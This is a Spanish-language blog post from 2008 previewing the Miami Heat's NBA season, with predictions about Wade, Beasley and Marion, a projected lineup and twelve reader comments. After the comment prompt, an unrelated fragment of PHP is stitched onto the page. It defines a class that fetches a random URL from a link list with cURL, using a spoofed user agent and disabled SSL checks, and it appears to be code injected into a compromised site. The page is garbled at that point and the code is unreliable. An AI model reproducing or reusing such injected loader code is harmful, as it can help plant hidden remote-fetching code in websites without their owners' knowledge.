Miami Heat: Recién ascendidos

20 de October de 2008 por Gallis

wademarionHay franquicias que realmente no saben la suerte que tienen de que la NBA sea una liga cerrada. Si hubiera ascensos y descensos, como en Europa, hace mucho tiempo que no sabríamos nada de equipos que, de esta forma, nos son muy familiares. Otros, en cambio, pese a que su trayectoria no merecería incluirles en ese grupo, hicieron méritos más que suficientes para un hipotético descenso el año pasado. Los Miami Heat son el más claro exponente. Comenzaban la temporada con ganas de revancha por su eliminación frente a los Bulls en primera ronda (4-0 pese a ser en ese momento los defensores del anillo) y aunque no eran favoritos en las quinielas de casi nadie, eran un equipo a tener muy en cuenta. Cualquier equipo con la pareja Wade & Shaq en sus filas lo es. Sin embargo, los problemas físicos de ambos al comienzo de la temporada pronto dieron al traste con cualquier mínima opción y el equipo acabó en un grado de descomposición tal que Shaq se fue en Phoenix a cambio de Shawn Marion, Wade decidió operarse para estar a punto en los Juegos Olímpicos, Haslem siguió sus pasos aunque le esperaba todo un verano de descanso y Pat Riley dejó de entrenar algunos partidos para ir a ver a jugadores universitarios, pensando en el draft. Total, Miami acabó la temporada el 16 de abril frente a los Hawks con un quinteto formado por Chris Quinn, Daequan Cook, Ricky Davis, Stephane Lasme y Mark Blount (del banquillo, mejor ni hablamos) y un paupérrimo balance de 15 victorias y 67 derrotas. Méritos más que suficientes para descender a la NBDL.

Así las cosas, la temporada que está a punto de comenzar se presenta como un punto de partida hacía un proyecto totalmente nuevo para los de Florida. Todos sabíamos que la apuesta por Shaq era a muy corto plazo y el resultado la avala, pero es momento de olvidar el pasado y seguir hacía adelante. Es difícil, cierto, porque una vez probadas las mieles del triunfo cuesta renunciar a ellas, pero no es menos cierto que, pese al reciente desastre, Miami no está en una posición tan mala. Primero de todo, porque en sus despachos siguen teniendo una de las pocas garantías que quedan en la NBA: Pat Riley. El reciente Hall of Fame es un tipo acostumbrado a coger franquicias en cualquier situación posible, exprimirlas al máximo y llevarlas lo más lejos posible. Ya lo ha hecho una vez en Miami y nada indica que no pueda volver a hacerlo. No será rápido, llevará su tiempo, pero con un poco de paciencia, Miami volverá a estar arriba y Pat Riley tendrá mucho que ver. Eso sí, muchos grandes movimientos tendría que hacer Riley de aquí a febrero para que este año Miami sea un verdadero outsider.

Si nos olvidamos de los despachos, el futuro de los Heat está en las manos de un solo hombre. Dwyane Wade. El escolta revelación del draft de Lebron afronta está temporada con más ganas que nunca. En cada una de las 2 últimas temporadas, las 2 posteriores al anillo, se ha perdido más de 30 partidos por problemas en su rodilla. De ahí que, como comentábamos antes, el año pasado renunció a acabar la temporada para recuperarse bien. A tenor de lo que vimos en los Juegos, lo está. Fue el mejor hombre de los campeones olímpicos y no dio ninguna señal de tener molestia alguna. Este año es consciente de que tiene que asumir los galones y ser el verdadero hombre franquicia de los Heat y, desde luego, cualidades tiene para ello. Si le respetan las lesiones, no será extraño que supere las medias de su carrera, casi 25 puntos por partido, casi 5 rebotes y más de 6 asistencias.

Junto a Wade, la gran esperanza de los Heat es Michael Beasley. La estrella de Kansas State, número 2 del draft, está llamado a hacer grandes cosas desde su estreno en la liga. Su capacidad atlética y reboteadora, todavía por demostrar, eso sí, deberían ser de gran ayuda para un equipo que ha perdido gran parte de su potencial interior con las ausencias de Shaq y Alonzo Mourning. Quizá sea demasiado bajo para jugar de 4, por lo que deberá añadir amenaza exterior a su juego para convertirse en la superestrella que muchos esperan. Y el tercer hombre en cuestión será el “sustituto” de Shaq, Shawn Marion. The Matrix salió de Phoenix en busca de un nuevo contrato que le diera el máximo. La situación del mercado y, quién sabe si la crisis económica mundial, le dejan este año sin su ansiada mejora salarial y en un equipo en el que las expectativas deportivas son mucho menores. Estadísticamente su año será magnífico. Siempre lo son y más en una temporada en la que acaba contrato y volverá a intentar que alguien pique. Otra cosa será su implicación en el proyecto. El año pasado, Marion abandonó al por aquel entonces primer equipo del Oeste por el último del este y lo hizo encantado de la vida. Algo que, desde luego, no habla muy bien de su ambición deportiva.

Del resto del equipo poco se puede destacar, de ahí la afirmación de que a Riley le queda mucho trabajo por delante. Udonis Haslem y Mark Blount son, junto a Marion, el arsenal interior del equipo. Jugadores cumplidores, pero a los que no se les puede exigir gran cosa. Está por ver que Jamaal Maagloire sea un refuerzo. Por fuera, los Heat esperan que proyectos como Dorrell Wright o Daequean Cook se conviertan en atractivas realidades, cosa que no parece muy probable. Marcus Banks está ante una nueva oportunidad para demostrar que no es un don nadie y, como prueba del estado de casi desesperación del equipo, los Heat han decidido darle una oportunidad a Shaun Livingston. Junto a ellos completan la plantilla jugadores más o menos intrascendentes como Chris Quinn, Diawara o James Jones.

Al frente de todo esto, un debutante. Erik Spoelstra. Desde luego su papeleta no es nada fácil, pero la ayudan 2 factores. Primero, ha sido durante mucho tiempo el primer ayudante de Pat Riley, lo cual es como un master de lujo para un entrenador de baloncesto. Desde luego está por ver cuáles son sus similitudes, cuáles sus diferencias y sobre todo, cómo reaccionará ahora que todos los focos le apuntan a él. Y segundo, no hay que olvidar que Miami está en el Este, una conferencia donde los últimos puestos con derecho a Playoff están muy abiertos. Un solo jugador no es capaz de ganar la NBA, pero no se puede decir lo mismo si hablamos de conseguir el octavo puesto del Este. Ése es un objetivo al alcance de un grande y seguro que Wade no está dispuesto a dejar pasar la oportunidad.

Quinteto inicial: Marcus Banks, Dwyane Wade, Michael Beasley, Shawn Marion y Mark Blount

Sexto hombre: Udonis Haslem

Pronóstico: Primera ronda de Playoffs

Comenta

12 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Das en el clavo. La clave de que algunos todavía consideremos a Miami como posible candidato a primera ronda es Wade… bueno, y el hecho de que estén en el este, claro, donde da la sensación que hay barra para todos. Él sólo, como jugador superior que es, ya garantiza un mínimo de pegada que en este caso concreto podría ser suficiente.
    Con la plantilla que hay, contando con cualquier otro líder de un escalón inferior al suyo serían candidatos claros a la cuchara de madera. Con todo, como bien dices, tienen puntos positivos a los que cogerse durante el futuro más inmediato… a no ser claro, que a Wade se le inflen las p… con el tiempo y decida pedir el traspaso (ni el primero ni el último sería)
    Ya tenemos ganas de conocer a la nueva perla de la liga o ver también cómo se gana Matrix sus habichuelas este año. Lo de este chico es un asunto demasiado turbio como para valorarlo a la ligera. Por lo que se comenta su situación en Phoenix era poco menos que irrespirable… de no ser así, es cierto que su actitud al respecto fue bastante incomprensible.
    Por último, nuestro idolatrado Riley… un caso similar a Phill Jackson. A uno, a pesar de la casi irracional admiración que se les profesa, siempre me asaltan las dudas de la vigencia de su capacidad, de si no están demasiado viejos para dar lo mejor de si mismo, de si sus métodos están anticuados o ya están demasiado de vuelta de todo, de si se sigue teniendo hambre después de haber probado los más suculentos manjares o ya están demasiado acomodados… qué se yo.
    El caso es que frente a esas dudas estos tipos siempre tienen la sana costumbre de disiparlas como sólo ellos saben.

      Citar

  2. Cross dice:
    #2

    Para mi los Heat son candidatos a entrar en play-offs.Primero porque tienen la estrella(Wade) que les falta a otros equipos competidores del este como son los Pacers,los Bobcats…y viendo lo que hizo Kobe el año de los 81 puntos y no con mucho mas equipo…Invade el optimismo.Lo segundo es que tienen a Riley,un competidor nato que se puede decir que se las sabe todas gracias a su experiencia y que no creo que le ponga muchas pegas a que Wade ”abuse” y actúe como base.Y lo tercero y creo que no mucha gente tiene en cuenta es a Beasley-Marion,un duo que si se conjunta bien puede hacer daño.Los dos son aleros que pueden jugar de ala-pívots y ahí es donde Pat podría jugar un poco mas,ya que si bien Beasley es mas alto,Marion es mas fuerte por lo que no se libran de una buena defensa ningún ala-pívot contrario.Ya solo con esto les veo mas candidatos que Nets,Bobcats,Pacers y Knicks.Lo duro va a ser la competencia con Wizards(lastarados por lesiones),Bucks,Hawks y Raptors.Aquí es donde esta la verdadera competencia de los Heat.Espero y confío en Chalmers y Dorrell Wright que creo que pueden ser clave,junto con que Haslem a veces pueda jugar de 5.Me atrevo a decir que este año el banquillo es aceptable con estos ultimos y con Cook.Les veo octavos del este.

      Citar

  3. MagicJohnson32 dice:
    #3

    Es un equipo con mucho margen. La impresión es que Wade se saldrá. Falta por ver si Marion pondrá más juego que números y si Beasley empieza ya a demostrar cosas. También hay dudas por el físico, porque Haslem y el propio Wade se han perdido muchos partidos. Ah, y con Blount de 5 titular no vas a ningún lado, y con Magloire de suplente menos todavía. Supongo que Haslem estará muchos minutos como C.

    Desde luego, pueden pelear por Playoffs.

      Citar

  4. Txusma dice:
    #4

    Lo primero decir que lo que hicieron los Heat el año pasado debió haber sido motivo de sanción y de que les quitaran no menos de 100 papeletas para el Draft.
    A partir de aquí creo que Beasley comenzará los partidos desde el banco viendo como los titulares son Marion, Haslem y Blount pero también creo que a los 5 minutos Blount se sentará y dejará su sitio al rookie

      Citar

  5. Txusma dice:
    #5

    Vaya! Se me ha publicado el comentario sin querer…
    Como decia Blount dejará rápido su sitio al rookie y jugaran Beasley, Marion y Haslem, un terceto muy peligroso aunq Haslem sudará cada noche para defender a sus pares y sufrirá en ataque (si es que le llega alguna). Como dice CROSS la pareja Beasley – Marion puede dar quebraderos de cabeza a mas de un equipo contrario y eso unido al talento de Wade, les deja como clatos candidatos a entrar en los Playoffs. Eso si, para mi el banquillo es deplorable teniendo en cuenta un quinteto formado por Banks, Wade, Beasley, Marion y Haslem.

      Citar

  6. Viva_Dirk dice:
    #6

    En teoría Wade-Beasley-Marion debe asegurar play-offs en el Este, si no es así el caché de estos bajará, aunque aun así hay GM´s muy cazurros que ofrecerán una pasta a Marion.

    Creo que no les he dado como equipo de play-offs y la verdad es que tiene toda la pinta de que entraran, jeje.

      Citar

  7. LiToS dice:
    #7

    Un poquito de spam…

    mi análisis de la conferencia Este:

    http://secciondeportiva.com/2008/10/analisis-temporada-0809-nba-conferencia-este/

      Citar

  8. Jabho dice:
    #8

    Como dice Viva el trío Wade-Marion-Beasley debería dar para PO a poco que aporte el rookie. Pero es que el resto es muy, muy malo. Pero tela de malo.

    Eso si, creo que harán algún movimiento para buscar un interior decente y ya si eso un base normalito no les vendrían mal. Lowry y Brad Miller por suponer y serían candidatos a mucho.

    A mi Riley no me genera ninguna duda. Uno de los grandes.

      Citar

  9. Jabho dice:
    #9

    Por cierto, que les veo en PO aunque para eso deberían hacer algún movimiento.

      Citar

  10. portu dice:
    #10

    Cross y Txusma han incidido en el dúo Marion-Beasley e incluso en el trío junto a Haslem, y me parece un análisis muy acertado, aunque la clave, evidentemente será Wade. Este equipo al contraataque puede ser la bomba con ese trío por dentro y Wade y Banks por fuera, mientras q en estático Wade buscará las penetraciones pero Beasley podrá encontrar sus mayores oportunidades para demostrar q puede ser una máquina de meter puntos. Pueden ser un equipo muy incómodo para cualquiera, pero claro, en defensa van a sufrir por dentro lo indecible. La apuesta está a punto de caramelo para un entrenador tipo D´Antoni, ya veremos a cuánto se atreve el rookie q hay en el banquillo.

      Citar

  11. txusma dice:
    #11

    Lo q se esta demostrando es q Beasley esun jugador tipo Gay: Primero yo, luego yo y despues, si no hay mas remedio, yo…

      Citar

  12. portu dice:
    #12

    Si Beasley hace lo q dice Txus en el 80% de casos cerquita del aro y de espaldas no me parecerá tan mal, ahora bien, si se dedica a tirarse triples al estilo Carmelo, entonces el tema es diferente… evidentemente todo con cierto criterio, ya q no hay nada peor q un chupón de los q llevan las cosas esas de los burros para q miren al frente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>